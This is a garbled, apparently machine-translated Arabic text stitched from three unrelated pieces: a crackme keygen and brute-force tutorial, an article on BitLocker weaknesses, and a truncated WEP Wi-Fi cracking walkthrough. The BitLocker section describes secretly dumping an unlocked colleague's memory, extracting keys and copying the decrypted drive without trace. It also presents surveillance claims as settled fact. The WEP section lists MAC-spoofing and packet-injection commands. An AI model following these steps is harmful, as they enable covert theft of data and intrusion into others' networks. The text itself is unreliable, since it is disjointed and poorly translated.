هناك كلمة مرور واحدة فقط. تعقيد
يزيد بسبب الحجم المطلوب
كلمة المرور والأحرف التي يجب أن تكون منها
تتكون.

الخوارزمية:

    التحليلات
    خوارزمية التحقق من كلمة المرور

    جاري الكتابة
    keygen (أداة تخمين كلمة المرور)

    إطلاق كجن

تحليل الخوارزمية
التحقق من كلمة المرور

للتحليل
يجب دراسة الخوارزمية بعناية
التحقق من كلمة المرور. لهذا الخاص بك
مصحح الأخطاء المفضل (Soft Ice ، TD ، DeGlucker ...) ، تحتاجه
انظر بعناية إلى ما يتم فحصه
كلمه السر. يمكن التحقق منها مقابل
sum (crc) ، في هذه الحالة ، على الأرجح كلمة المرور
سيضطر إلى البحث بالقوة الغاشمة ، أو ربما
تحقق من وجود بعض الشخصيات ، إذن
يمكنك "تخمين" كلمة المرور بأكملها ، أو على الأقل
عدد قليل من شخصياته ، وسيضطر الباقي إلى ذلك
البحث عن طريق البحث.

مراقبة
مجموع قسم الكود ، هذا رقم (عادةً اثنان
أو أربعة بايت ، في علبة كرامي
تستخدم وبايت واحد)
يحتوي على معلومات حول هذا الجزء من التعليمات البرمجية.
بالنسبة إلى كراكمي ، تُستخدم الإجراءات بشكل شائع
حساب المجموع الاختباري البدائي (على سبيل المثال
المحفوظات تستخدم crc32). يعتبر
مثال على الخوارزمية التي تحسب
المجموع الاختباري:

على سبيل المثال ، كل شيء
يتم إضافة بايتات المؤامرة ، ويتضح ذلك
الرقم هو رقم وهو عنصر تحكم
كمية المنطقة. على سبيل المثال ، لدينا قطعة أرض
كود يتكون من 5 بايت:

001 004 000 005 100

مراقبة
مجموعها يساوي 1 + 4 + 0 + 5 + 100 = 110.

الأساسية
صعوبة اختراق الشقوق التي تتحقق
كلمة المرور الخاصة بـ crc هي أنه لا يمكن تحلل crc! هؤلاء.
معرفة المجموع الاختباري لكلمة المرور - 110 نحن لا نفعل ذلك
يمكننا معرفة ما لا يقل عن واحد منها
عناصر كلمة المرور.

كتابة مفتاح

عمليا ل
تحتاج جميع أنواع المفرقعات إلى كتابة keygen ،
باستثناء الرئتين. يمكن كسرها بسهولة
تقريبًا أي اختراق بت كرامي (اختراق بت ،
استبدال عدة بايت) ، لكن المؤلفين يسألون
قل كلمة المرور ، ويضيع أهم شيء
فائدة.

بغرض
للعثور على كلمة مرور من 3 أحرف أمر ضروري
نوعًا ما تقريبًا:255
* 255 * 255 تركيبات

يمكن تخفيضها
عدد التركيبات ، على سبيل المثال معرفة ذلك في
كلمة السر تستخدم اللغة الإنجليزية فقط
أحرف (كبيرة وصغيرة) ، ثم بدلاً من 255
سيتعين على الأحرف تكرار 52 فقط. إذا
فقط الأرقام التي سنكررها على 10 فقط
الشخصيات.

يجب كجن
حفظ العداد من فك التشفير
مجموعات. منذ كلمات السر القوة الغاشمة
يستغرق وقتا طويلا ، ثم يغادر
لا يمكنك تشغيل الكمبيوتر لبضعة أيام ،
فجأة كنت في حاجة إليها. يمكن إدخالها في
كجن القدرة على حفظ العداد في
ملف ، وعند بدء التشغيل اقرأه من الملف و
تواصل فك التشفير من المقاطعة
المواقف.

إطلاق KEYGEN

كلمات مرور القوة الغاشمة ،
اعتمادًا على بعض المعلمات (بتنسيق
بشكل رئيسي على عدد كلمات المرور الممكنة
الأحرف وحجم كلمة المرور) يتطلب
فترة زمنية طويلة إلى حد ما.
يمكن استخدام أجهزة كمبيوتر متعددة
كل منها سوف تحقق بعض
بعض التوليفات.

يستخدم الكثيرون ميزة تشفير Windows ، ولكن لا يفكر الجميع في أمان طريقة حماية البيانات هذه. سنتحدث اليوم عن تشفير Bitlocker ونحاول معرفة مدى تنفيذ حماية قرص Windows.

بالمناسبة ، يمكنك أن تقرأ عن كيفية إعداد Bitlocker في المقالة "".

  • مقدمة
  • كيف يعمل Bitlocker؟
    • نقاط الضعف
    • مفاتيح الاسترداد
    • فتح BitLocker
    • BitLocker To Go
  • خاتمة

المقال مكتوب لأغراض البحث. جميع المعلومات الواردة فيه هي لأغراض إعلامية فقط. إنه موجه إلى المتخصصين في مجال الأمن وأولئك الذين يريدون أن يصبحوا كذلك.

كيف يعمل Bitlocker؟

ما هو Bitlocker؟

BitLocker هي ميزة تشفير قرص أصلي في أنظمة التشغيل Windows 7 و 8 و 8.1 و 10. تسمح لك هذه الميزة بتشفير البيانات السرية بأمان على جهاز الكمبيوتر الخاص بك ، سواء على محرك الأقراص الثابتة أو محرك أقراص الحالة الثابتة أو على الوسائط القابلة للإزالة.

كيف يتم إعداد BitLocker؟

لا ينبغي الحكم على موثوقية BitLocker من خلال سمعة AES. قد لا يحتوي معيار التشفير المشهور على نقاط ضعف بصراحة ، ولكن غالبًا ما يكثر تطبيقه في منتجات تشفير معينة. لا تكشف Microsoft عن التعليمات البرمجية الكاملة لتقنية BitLocker. من المعروف فقط أنه في الإصدارات المختلفة من Windows كان يعتمد على مخططات مختلفة ، ولم يتم التعليق على التغييرات بأي شكل من الأشكال. علاوة على ذلك ، في الإصدار 10586 من Windows 10 ، اختفى ببساطة ، وظهر مرة أخرى بعد بنائين. ومع ذلك ، أول الأشياء أولا.

استخدم الإصدار الأول من BitLocker وضع تسلسل كتلة النص المشفر (CBC). حتى ذلك الحين ، كانت عيوبه واضحة: سهولة الهجوم على نص معروف ، ضعف مقاومة الهجمات حسب نوع الاستبدال ، وما إلى ذلك. لذلك ، قررت Microsoft على الفور تعزيز الحماية. بالفعل في Vista ، تمت إضافة خوارزمية Elephant Diffuser إلى مخطط AES-CBC ، مما يجعل من الصعب مقارنة كتل النص المشفر مباشرةً. مع ذلك ، أعطت نفس محتويات القطاعين ، بعد التشفير بمفتاح واحد ، نتيجة مختلفة تمامًا ، مما أدى إلى تعقيد حساب النمط المشترك. ومع ذلك ، كان المفتاح الافتراضي نفسه قصيرًا - 128 بت. من خلال السياسات الإدارية ، يمكن أن يمتد إلى 256 بت ، لكن هل يستحق ذلك؟

بالنسبة للمستخدمين ، بعد تغيير المفتاح ، لن يتغير أي شيء خارجيًا - لا طول كلمات المرور التي تم إدخالها ولا السرعة الذاتية للعمليات. مثل معظم أنظمة تشفير القرص الكامل ، يستخدم BitLocker مفاتيح متعددة ... ولا يكون أي منها مرئيًا للمستخدمين. هنا رسم تخطيطي لـ BitLocker.

  • عند تنشيط BitLocker باستخدام مولد رقم عشوائي زائف ، يتم إنشاء تسلسل بت رئيسي. هذا هو مفتاح تشفير وحدة التخزين - FVEK (مفتاح تشفير الحجم الكامل). إنه هو الذي يقوم الآن بتشفير محتويات كل قطاع.
  • بدوره ، يتم تشفير FVEK باستخدام مفتاح آخر - VMK (المفتاح الرئيسي لوحدة التخزين) - ويتم تخزينه في شكل مشفر بين البيانات الوصفية لوحدة التخزين.
  • يتم أيضًا تشفير VMK نفسه ، ولكن بطرق مختلفة حسب اختيار المستخدم.
  • على اللوحات الأم الجديدة ، يتم تشفير مفتاح VMK افتراضيًا باستخدام مفتاح SRK (مفتاح جذر التخزين) ، والذي يتم تخزينه في معالج تشفير منفصل - وحدة منصة موثوقة (TPM). لا يمتلك المستخدم حق الوصول إلى محتوى TPM ، وهو فريد لكل كمبيوتر.
  • إذا لم تكن هناك شريحة TPM منفصلة على اللوحة ، فبدلاً من SRK ، يتم استخدام رمز PIN الذي أدخله المستخدم أو محرك أقراص USB محمول عند الطلب مع معلومات أساسية مكتوبة مسبقًا عليه لتشفير مفتاح VMK.
  • بالإضافة إلى TPM أو محرك أقراص فلاش ، يمكنك حماية مفتاح VMK بكلمة مرور.

استمر هذا السلوك العام لـ BitLocker في الإصدارات اللاحقة من Windows حتى الوقت الحاضر. ومع ذلك ، فقد تغير إنشاء المفتاح وأنماط التشفير في BitLocker. لذلك ، في أكتوبر 2014 ، أزالت Microsoft بهدوء خوارزمية Elephant Diffuser الإضافية ، ولم يتبق سوى مخطط AES-CBC مع عيوبه المعروفة. في البداية ، لم يتم الإدلاء بأي تصريحات رسمية حول هذا الموضوع. تم منح الأشخاص ببساطة تقنية تشفير ضعيفة تحمل الاسم نفسه تحت ستار التحديث. تبعت التفسيرات الغامضة لهذه الخطوة بعد أن لاحظ باحثون مستقلون التبسيط في BitLocker.

رسميًا ، كان من الضروري إزالة Elephant Diffuser للتأكد من أن Windows يتوافق مع معايير معالجة المعلومات الفيدرالية الأمريكية (FIPS) ، ولكن هناك حجة واحدة تدحض هذا الإصدار: Vista و Windows 7 ، اللذان يستخدمان Elephant Diffuser ، تم بيعهما دون مشاكل في أمريكا.

سبب وهمي آخر لرفض الخوارزمية الإضافية هو عدم وجود تسريع للأجهزة لـ Elephant Diffuser وفقدان السرعة عند استخدامه. ومع ذلك ، في السنوات السابقة ، عندما كانت المعالجات أبطأ ، كانت سرعة التشفير مناسبة لها لسبب ما. وقد تم استخدام نفس AES على نطاق واسع حتى قبل وجود مجموعات تعليمات منفصلة ورقائق متخصصة لتسريعها. بمرور الوقت ، كان من الممكن تسريع الأجهزة لـ Elephant Diffuser أيضًا ، أو على الأقل منح العملاء الاختيار بين السرعة والأمان.

نسخة أخرى غير رسمية تبدو أكثر واقعية. لقد أعاق "الفيل" الموظفين الذين أرادوا بذل جهد أقل في فك تشفير القرص التالي ، وتتفاعل Microsoft عن طيب خاطر مع السلطات حتى في الحالات التي تكون فيها طلباتهم غير قانونية تمامًا. يؤكد بشكل غير مباشر نظرية المؤامرة وحقيقة أنه قبل Windows 8 ، عند إنشاء مفاتيح التشفير في BitLocker ، تم استخدام مولد الأرقام العشوائية الزائفة المضمنة في Windows. في العديد من إصدارات Windows (إن لم يكن كلها) ، كان هذا Dual_EC_DRBG - "تشفير قوي PRNG" طورته وكالة الأمن القومي الأمريكية ويحتوي على عدد من الثغرات الأمنية الكامنة.

بالطبع ، تسبب الضعف السري للتشفير الداخلي في موجة قوية من الانتقادات. تحت ضغطها ، أعادت Microsoft كتابة BitLocker مرة أخرى ، لتحل محل PRNG بـ CTR_DRBG في الإصدارات الجديدة من Windows. بالإضافة إلى ذلك ، في نظام التشغيل Windows 10 (بدءًا من الإصدار 1511) ، يكون نظام التشفير الافتراضي هو AES-XTS ، وهو محصن ضد معالجة كتلة النص المشفر. في أحدث إصدارات "العشرات" ، تم إصلاح عيوب أخرى معروفة في BitLocker ، لكن المشكلة الرئيسية لا تزال قائمة. إنه أمر سخيف لدرجة أنه يجعل الابتكارات الأخرى بلا معنى. يتعلق الأمر بمبادئ الإدارة الرئيسية.

أصبحت مهمة فك تشفير محركات BitLocker أسهل أيضًا من خلال حقيقة أن Microsoft تعمل بنشاط على الترويج لطريقة بديلة لاستعادة الوصول إلى البيانات من خلال Data Recovery Agent. معنى "الوكيل" هو أنه يشفر مفاتيح التشفير لجميع محركات الأقراص داخل شبكة المؤسسة بمفتاح وصول واحد. بمجرد الحصول عليه ، يمكنك فك تشفير أي مفتاح ، وبالتالي أي قرص تستخدمه نفس الشركة. ملائم؟ نعم ، خاصة بالنسبة للقرصنة.

لقد تم بالفعل اختراق فكرة استخدام مفتاح واحد لجميع الأقفال عدة مرات ، ولكن لا يزال يتم إرجاعها بشكل أو بآخر من أجل الراحة. إليكم كيف سجل رالف لايتون مذكرات ريتشارد فاينمان حول حلقة مميزة واحدة من عمله في مشروع مانهاتن في مختبر لوس ألاموس: "... فتحت ثلاث خزائن - وكلها الثلاثة بمجموعة واحدة. لقد قمت بها جميعًا: فتحت الخزائن بكل أسرار القنبلة الذرية - تقنية الحصول على البلوتونيوم ، وصف لعملية التنقية ، ومعلومات حول كمية المواد المطلوبة ، وكيف تعمل القنبلة ، وكيف يتم صنع النيوترونات ، وكيف القنبلة مرتبة ، ما هي أبعادها - باختصار ، كل شيء ، ما عرفوه في لوس ألاموس ، المطبخ كله!

يذكرنا BitLocker إلى حد ما بالجهاز الآمن الموصوف في جزء آخر من الكتاب "بالطبع أنت تمزح ، سيد فاينمان!". كانت الخزنة الأكثر فرضًا في المختبر شديد السرية لها نفس نقاط الضعف مثل خزانة الملفات البسيطة. "... كان عقيدًا ، وكان لديه خزنة أكثر تعقيدًا ببابين مع مقابض كبيرة تسحب أربعة قضبان فولاذية بسمك ثلاثة أرباع بوصة من الهيكل. نظرت إلى الجزء الخلفي من أحد الأبواب البرونزية المهيبة ووجدت أن الاتصال الهاتفي الرقمي متصل بقفل صغير يشبه تمامًا القفل الموجود على خزانة خزانة Los Alamos الخاصة بي. كان من الواضح أن نظام الروافع يعتمد على نفس القضيب الصغير الذي أقفل خزائن الملفات .. تصورًا لنوع من النشاط ، بدأت في تحريف القرص بشكل عشوائي. بعد دقيقتين - انقر! - تم فتح الخزنة. عندما يكون باب الخزانة أو الدرج العلوي لخزانة الملفات مفتوحًا ، فمن السهل جدًا العثور على التشكيلة. هذا ما فعلته عندما قرأت تقريري ، فقط لأظهر لك الخطر ".

حاويات تشفير BitLocker آمنة تمامًا بمفردها. إذا أحضر لك شخص ما محرك أقراص فلاش يأتي من أي مكان ، مشفرًا باستخدام BitLocker To Go ، فمن غير المرجح أن تقوم بفك تشفيره في وقت معقول. ومع ذلك ، في سيناريو حقيقي باستخدام محركات الأقراص المشفرة والوسائط القابلة للإزالة ، هناك العديد من نقاط الضعف التي يسهل استخدامها لتجاوز BitLocker.

ثغرات BitLocker

بالتأكيد لاحظت أنه عند تنشيط Bitlocker لأول مرة ، عليك الانتظار لفترة طويلة. هذا ليس مفاجئًا - يمكن أن تستغرق عملية التشفير لكل قطاع عدة ساعات ، لأنه لا يمكن حتى قراءة جميع كتل محركات الأقراص الصلبة التي تيرابايت بشكل أسرع. ومع ذلك ، يحدث تعطيل BitLocker على الفور تقريبًا - فكيف يحدث ذلك؟

الحقيقة هي أنه عند تعطيله ، لا يقوم Bitlocker بفك تشفير البيانات. ستبقى جميع القطاعات مشفرة باستخدام مفتاح FVEK. ببساطة ، لن يتم تقييد الوصول إلى هذا المفتاح بأي شكل من الأشكال. سيتم تعطيل جميع عمليات التحقق ، وسيظل VMK مسجلاً بين البيانات الوصفية للنص الواضح. في كل مرة تقوم فيها بتشغيل الكمبيوتر ، يقوم مُحمل نظام التشغيل بقراءة VMK (بالفعل دون التحقق من TPM ، وطلب مفتاح على محرك أقراص فلاش أو كلمة مرور) ، ويفك تشفير FVEK به تلقائيًا ، ثم جميع الملفات بمجرد الوصول إليها. بالنسبة للمستخدم ، سيبدو كل شيء وكأنه نقص كامل في التشفير ، ولكن قد يلاحظ الأشخاص الأكثر اهتمامًا انخفاضًا طفيفًا في أداء نظام القرص الفرعي. بتعبير أدق - عدم زيادة السرعة بعد تعطيل التشفير.

هناك شيء آخر مثير للاهتمام في هذا المخطط. على الرغم من الاسم (تقنية تشفير القرص الكامل) ، فإن بعض البيانات عند استخدام BitLocker لا تزال غير مشفرة. تظل MBR و BS في شكل مفتوح (ما لم يتم تهيئة القرص في GPT) والقطاعات السيئة والبيانات الوصفية. محمل الإقلاع المفتوح يوفر مساحة للخيال. في القطاعات الزائفة السيئة ، من الملائم إخفاء البرامج الضارة الأخرى ، وتحتوي البيانات الوصفية على الكثير من الأشياء المثيرة للاهتمام ، بما في ذلك نسخ المفاتيح. إذا كان Bitlocker نشطًا ، فسيتم تشفيره (لكن أضعف من تشفير FVEK لمحتويات القطاعات) ، وإذا تم إلغاء تنشيطه ، فسيكون ببساطة في وضع واضح. هذه كلها نواقل هجوم محتملة. إنها محتملة لأنه ، بالإضافة إلى ذلك ، هناك الكثير منها أبسط وأكثر عالمية.

مفتاح استرداد Bitlocker

بالإضافة إلى FVEK و VMK و SRK ، يستخدم BitLocker نوعًا آخر من المفاتيح التي يتم إنشاؤها "فقط في حالة". هذه هي مفاتيح الاسترداد التي يرتبط بها ناقل هجوم شائع آخر. يخشى المستخدمون من نسيان كلمة المرور الخاصة بهم وفقدان الوصول إلى النظام ، ويوصي Windows نفسه بإجراء تسجيل دخول طارئ. للقيام بذلك ، يطالبك معالج تشفير BitLocker في الخطوة الأخيرة بإنشاء مفتاح استرداد. لم يتم توفير رفض إنشائه. يمكنك فقط اختيار أحد خيارات التصدير الرئيسية ، كل منها ضعيف للغاية.

في الإعدادات الافتراضية ، يتم تصدير المفتاح كملف نصي بسيط باسم يمكن التعرف عليه: "مفتاح استرداد BitLocker #" ، حيث تتم كتابة معرف الكمبيوتر بدلاً من # (نعم ، في اسم الملف!). المفتاح نفسه يبدو هكذا.

إذا نسيت (أو لم تعرف مطلقًا) كلمة المرور التي تم تعيينها في BitLocker ، فما عليك سوى البحث عن الملف باستخدام مفتاح الاسترداد. بالتأكيد سيتم حفظه بين مستندات المستخدم الحالي أو على محرك أقراص فلاش الخاص به. ربما يتم طباعته على قطعة من الورق ، كما توصي Microsoft.

للعثور بسرعة على مفتاح الاسترداد ، من الملائم تقييد البحث حسب الامتداد (txt) وتاريخ الإنشاء (إذا كنت تعرف تقريبًا متى يمكن تمكين BitLocker) وحجم الملف (1388 بايت إذا لم يتم تحرير الملف) . بمجرد العثور على مفتاح الاسترداد ، انسخه. باستخدامه ، يمكنك تجاوز التفويض القياسي في BitLocker في أي وقت. للقيام بذلك ، ما عليك سوى الضغط على Esc وإدخال مفتاح الاسترداد. ستسجل الدخول دون مشاكل وستكون قادرًا على تغيير كلمة المرور في BitLocker إلى كلمة مرور عشوائية دون تحديد كلمة المرور القديمة!

فتح BitLocker

حقيقة التشفيرالنظام هو حل وسط بين الراحة والسرعة والموثوقية. يجب أن يشتمل على إجراءات تشفير شفاف مع فك تشفير سريع وطرق لاستعادة كلمات المرور المنسية والعمل المريح مع المفاتيح. كل هذا يضعف أي نظام ، بغض النظر عن مدى قوة الخوارزميات التي يعتمد عليها. لذلك ، ليس من الضروري البحث عن نقاط الضعف مباشرةفي خوارزمية Rijndael أو في مخططات مختلفة لمعيار AES. من الأسهل بكثير العثور عليها في تفاصيل تنفيذ معين.

في حالة Microsoft ، هذه "الخصوصية" كافية. على سبيل المثال ، يتم إرسال نسخ مفاتيح BitLocker افتراضيًا إلى SkyDrive وإيداعها في Active Directory.

حسنًا ، ماذا لو فقدتهم ... أو يسأل العميل سميث. من غير الملائم أن تجعل العميل ينتظر ، والأهم من ذلك أن تجعل الوكيل ينتظر. لهذا السبب المقارنة قوة التشفيرتتلاشى AES-XTS و AES-CBC مع Elephant Diffuser في الخلفية ، كما تفعل التوصيات لزيادة طول المفتاح. بغض النظر عن المدة التي يستغرقها المهاجم بسهولة غير مشفرشكل .

يعد استرداد مفاتيح الضمان من حساب Microsoft أو حساب AD هو الطريقة الرئيسية لكسر BitLocker. إذا لم يسجل المستخدم حسابًا في سحابة Microsoft ، ولم يكن جهاز الكمبيوتر الخاص به في المجال ، فستظل هناك طرق لاستخراج مفاتيح التشفير. في سياق التشغيل العادي ، يتم تخزين نسخهم المفتوحة دائمًا في ذاكرة الوصول العشوائي (وإلا فلن يكون هناك "تشفير شفاف"). هذا يعني أنها متوفرة في ملف التفريغ والسبات الخاص بها.

لماذا يتم الاحتفاظ بها هناك على الإطلاق؟

كما هو سخيف - للراحة ابتسامة. تم تصميم BitLocker للحماية من الهجمات في وضع عدم الاتصال فقط. تكون دائمًا مصحوبة بإعادة التشغيل وتوصيل القرص بنظام تشغيل آخر ، مما يؤدي إلى مسح ذاكرة الوصول العشوائي. ومع ذلك ، في الإعدادات الافتراضية ، يقوم نظام التشغيل بتفريغ ذاكرة الوصول العشوائي عند حدوث عطل (يمكن استفزازه) ويكتب جميع محتوياته في ملف الإسبات في كل مرة ينتقل فيها الكمبيوتر إلى وضع السكون العميق. لذلك إذا قمت بتسجيل الدخول مؤخرًا إلى Windows مع تمكين BitLocker ، فهناك فرصة جيدة للحصول على نسخة مشفرة من VMK واستخدامها لفك تشفير FVEK ثم البيانات نفسها أسفل السلسلة.

دعونا تحقق؟ يتم جمع جميع طرق القرصنة BitLocker الموضحة أعلاه في برنامج واحد - Forensic Disk Decryptor ، الذي طورته شركة Elcomsoft المحلية. يمكنه استخراج مفاتيح التشفير تلقائيًا وتركيب وحدات تخزين مشفرة كمحركات أقراص افتراضية ، وفك تشفيرها أثناء التنقل.

بالإضافة إلى ذلك ، تطبق EFDD طريقة أخرى غير تافهة للحصول على المفاتيح - من خلال الهجوم عبر منفذ FireWire ، والذي يُنصح باستخدامه في حالة عدم إمكانية تشغيل برنامجك على الكمبيوتر المعرض للهجوم. نقوم دائمًا بتثبيت برنامج EFDD نفسه على جهاز الكمبيوتر الخاص بنا ، وعلى الجهاز المخترق نحاول إدارته بأقل قدر ممكن من الإجراءات اللازمة.

على سبيل المثال ، لنقم فقط بتشغيل نظام اختبار مع تنشيط BitLocker وعمل تفريغ ذاكرة "بشكل غير مرئي". لذلك سنحاكي موقفًا خرج فيه أحد الزملاء لتناول طعام الغداء ولم يقفل جهاز الكمبيوتر الخاص به. نقوم بتشغيل RAM Capture وفي أقل من دقيقة نحصل على تفريغ كامل في ملف بامتداد .mem وحجم يتوافق مع مقدار ذاكرة الوصول العشوائي المثبتة على كمبيوتر الضحية.

من القيام بتفريغ - إلى حد كبير دون فرق. بغض النظر عن الامتداد ، سيصبح هذا ملفًا ثنائيًا ، والذي سيتم بعد ذلك تحليله تلقائيًا بواسطة EFDD بحثًا عن المفاتيح.

نكتب التفريغ إلى محرك أقراص فلاش USB أو ننقله عبر الشبكة ، وبعد ذلك نجلس على جهاز الكمبيوتر الخاص بنا ونشغل EFDD.

حدد خيار "استخراج المفاتيح" وأدخل المسار إلى الملف مع تفريغ الذاكرة كمصدر للمفاتيح.

BitLocker عبارة عن حاوية تشفير نموذجية ، مثل PGP Disk أو TrueCrypt. تبين أن هذه الحاويات يمكن الاعتماد عليها تمامًا من تلقاء نفسها ، ولكن تطبيقات العميل للعمل معها تحت مفاتيح تشفير Windows القمامة في ذاكرة الوصول العشوائي. لذلك ، يتم تنفيذ سيناريو الهجوم الشامل في EFDD. يبحث البرنامج على الفور عن مفاتيح التشفير من جميع الأنواع الثلاثة لحاويات التشفير الشائعة. لذلك ، يمكنك ترك جميع العناصر محددة - ماذا لو استخدمت الضحية سرًا أو PGP!

بعد بضع ثوانٍ ، يعرض Elcomsoft Forensic Disk Decryptor جميع المفاتيح الموجودة في نافذته. للراحة ، يمكن حفظها في ملف - سيكون هذا مفيدًا في المستقبل.

الآن لم يعد BitLocker عائقا! يمكنك تنفيذ هجوم تقليدي في وضع عدم الاتصال - على سبيل المثال ، سحب محرك أقراص ثابت ونسخ محتوياته. للقيام بذلك ، ما عليك سوى توصيله بجهاز الكمبيوتر وتشغيل EFDD في وضع "فك تشفير أو تحميل القرص".

بعد تحديد المسار إلى الملفات ذات المفاتيح المحفوظة ، ستقوم EFDD من اختيارك بفك تشفير كامل لوحدة التخزين أو فتحها على الفور كقرص افتراضي. في الحالة الأخيرة ، يتم فك تشفير الملفات عند الوصول إليها. في كلتا الحالتين ، لا يتم إجراء أي تغييرات على المجلد الأصلي ، لذا يمكنك إعادته في اليوم التالي كما لو لم يحدث شيء. يحدث العمل مع EFDD بدون أثر ومع نسخ البيانات فقط ، وبالتالي يظل غير مرئي.

BitLocker To Go

بدءًا من "السبعة" في Windows ، أصبح من الممكن تشفير محركات الأقراص المحمولة ومحركات الأقراص الثابتة USB والوسائط الخارجية الأخرى. تقوم تقنية تسمى BitLocker To Go بتشفير محركات الأقراص القابلة للإزالة بنفس طريقة محركات الأقراص المحلية. يتم تمكين التشفير بواسطة العنصر المقابل في قائمة سياق المستكشف.

بالنسبة لمحركات الأقراص الجديدة ، يمكنك استخدام تشفير المنطقة المشغولة فقط - مع ذلك ، فإن المساحة الخالية للقسم مليئة بالأصفار وليس هناك ما تخفيه هناك. إذا تم استخدام محرك الأقراص بالفعل ، فمن المستحسن تمكين التشفير الكامل عليه. خلاف ذلك ، سيظل الموقع الذي تم تمييزه على أنه مجاني غير مشفر. قد يحتوي على ملفات محذوفة مؤخرًا بنص عادي لم يتم استبدالها بعد.

حتى التشفير السريع للمنطقة المزدحمة فقط يستغرق من عدة دقائق إلى عدة ساعات. تعتمد هذه المرة على كمية البيانات وعرض النطاق الترددي للواجهة وخصائص محرك الأقراص وسرعة حسابات التشفير للمعالج. نظرًا لأن التشفير يكون مصحوبًا بالضغط ، فعادةً ما تزداد المساحة الخالية على القرص المشفر قليلاً.

في المرة التالية التي تقوم فيها بتوصيل محرك أقراص فلاش مشفر بأي جهاز كمبيوتر يعمل بنظام Windows 7 أو إصدار أحدث ، سيتم تشغيل معالج BitLocker تلقائيًا لإلغاء تأمين محرك الأقراص. في Explorer ، قبل إلغاء القفل ، سيتم عرضه كقرص مقفل.

هنا يمكنك استخدام كل من حلول BitLocker التي تمت مناقشتها بالفعل (على سبيل المثال ، البحث عن مفتاح VMK في ملف تفريغ الذاكرة أو الإسبات) ، والحلول الجديدة المتعلقة بمفاتيح الاسترداد.

إذا كنت لا تعرف كلمة المرور ، ولكنك تمكنت من العثور على أحد المفاتيح (يدويًا أو باستخدام EFDD) ، فهناك خياران رئيسيان للوصول إلى محرك الأقراص المحمول المشفر:

  • استخدم معالج BitLocker المدمج للعمل مباشرة مع محرك الأقراص المحمول ؛
  • استخدم EFDD لفك تشفير محرك الأقراص المحمول بالكامل وإنشاء صورته لكل قطاع على حدة.

يتيح لك الخيار الأول الوصول فورًا إلى الملفات المسجلة على محرك أقراص فلاش ، ونسخها أو تغييرها ، وكذلك نسخ الملفات الخاصة بك. يستغرق الخيار الثاني وقتًا أطول بكثير (من نصف ساعة) ، لكن له مزاياه. تسمح لك الصورة القطاعية التي تم فك تشفيرها بإجراء تحليل أكثر دقة لنظام الملفات على مستوى معمل الطب الشرعي. في هذه الحالة ، لم تعد هناك حاجة إلى محرك الأقراص المحمول نفسه ويمكن إعادته بدون تغيير.

يمكن فتح الصورة الناتجة على الفور في أي برنامج يدعم تنسيق IMA ، أو تحويلها أولاً إلى تنسيق آخر (على سبيل المثال ، باستخدام UltraISO).

بالطبع ، بالإضافة إلى العثور على مفتاح الاسترداد لـ BitLocker2Go ، يتم دعم جميع طرق تجاوز BitLocker الأخرى في EFDD. ما عليك سوى تكرار جميع الخيارات المتاحة في صف واحد حتى تجد مفتاحًا من أي نوع. سيتم فك تشفير الباقي (حتى FVEK) بأنفسهم على طول السلسلة ، وستحصل على وصول كامل إلى القرص.

خاتمة

تختلف تقنية تشفير القرص الكامل في BitLocker بين إصدارات Windows. بمجرد تكوينه بشكل صحيح ، فإنه يسمح لك بإنشاء حاويات تشفير يمكن مقارنتها نظريًا بقوة TrueCrypt أو PGP. ومع ذلك ، فإن الآلية المضمنة للعمل مع المفاتيح في Windows تلغي جميع الحيل الخوارزمية. على وجه الخصوص ، يتم استرداد مفتاح VMK المستخدم لفك تشفير المفتاح الرئيسي في BitLocker باستخدام EFDD في بضع ثوانٍ من نسخة مكررة أو تفريغ ذاكرة أو ملف إسبات أو هجوم منفذ FireWire.

بمجرد حصولك على المفتاح ، يمكنك تنفيذ هجوم كلاسيكي دون اتصال بالإنترنت ، والنسخ الخفي وفك تشفير جميع البيانات تلقائيًا على محرك الأقراص "المحمي". لذلك ، يجب استخدام BitLocker فقط مع وسائل الحماية الأخرى: نظام تشفير الملفات (EFS) ، وخدمات إدارة الحقوق (RMS) ، والتحكم في بدء تشغيل البرنامج ، وتثبيت الجهاز والتحكم في الاتصال ، والسياسات المحلية الأكثر صرامة وإجراءات الأمان العامة.

استخدم المقال مواد الموقع:

كيفية اختراق شبكة wifi؟ لقد سمع الكثير منا أنه عند إعداد نقطة اتصال Wi-Fi ، يجب ألا تختار تشفير WEP أبدًا ، لأنه من السهل جدًا اختراقه. على الأرجح ، حاول عدد قليل فقط القيام بذلك بمفردهم ، ويعرف نفس الرقم تقريبًا كيف يبدو كل شيء حقًا. يوجد أدناه نوع مختلف من اختراق نقطة باستخدام بروتوكول التشفير هذا ، بحيث يمكنك أن تدرك بشكل أكثر وضوحًا مدى واقعية الموقف عندما يتصل شخص ما بنقطة سرية للغاية ، وما الذي يدور حوله هذا الاختراق. بطبيعة الحال ، لا يمكن بأي حال من الأحوال استخدام هذا على جهاز توجيه شخص آخر. هذه المادة للأغراض الإعلامية فقط وتدعو إلى التخلي عن بروتوكولات التشفير التي يسهل اختراقها.

للاختراق ، سيحتاج المهاجم إلى:

  • محول Wi-Fi مناسب مع إمكانية حقن الحزمة (مثل Alfa AWUS036H)
  • قرص BackTrack Live CD
  • في الواقع ، نقطة وصول Wi-Fi الخاصة بك مع تشفير WEP ، والتي سيتم تعيين التجربة عليها
  • الصبر

بعد تشغيل سطر أوامر BackTrack المسمى Konsole ، تحتاج إلى إدخال الأمر التالي:

سترى واجهة الشبكة المسماة "ra0" أو شيء من هذا القبيل. تذكر هذا الاسم. في المستقبل ، سيشار إليها بـ (الواجهة) ، وتستبدلها باسمك. بعد ذلك ، أدخل 4 أسطر بالتسلسل:

توقف airmon-ng (واجهة)
ifconfig (الواجهة) لأسفل
macchanger --mac 00: 11: 22: 33: 44: 55 (واجهة)
بداية airmon-ng (واجهة)

الآن لدينا عنوان MAC مزيف. يدخل:

airodump-ng (واجهة)

ستبدأ قائمة بالشبكات اللاسلكية المتاحة في الظهور. بمجرد ظهور الشبكة المطلوبة في القائمة ، يمكنك الضغط على Ctrl + C لإيقاف البحث. تحتاج إلى نسخ BSSID للشبكة وتذكر القناة (العمود CH). تأكد أيضًا من إدراج WEP في عمود ENC.

نبدأ الآن في جمع المعلومات من هذه الشبكة:

airodump-ng -c (قناة) -w (اسم الملف) --bssid (bssid) (الواجهة)

القناة هي القناة من عمود CH ، واسم الملف هو اسم الملف الذي سيتم كتابة كل شيء فيه ، و bssid هو معرف الشبكة.

سترى شيئًا مشابهًا لما يظهر في لقطة الشاشة. اترك هذه النافذة كما هي. افتح نافذة Konsole جديدة واكتب:

aireplay-ng -1 0 -a (bssid) -h 00: 11: 22: 33: 44: 55 -e (essid) (الواجهة)

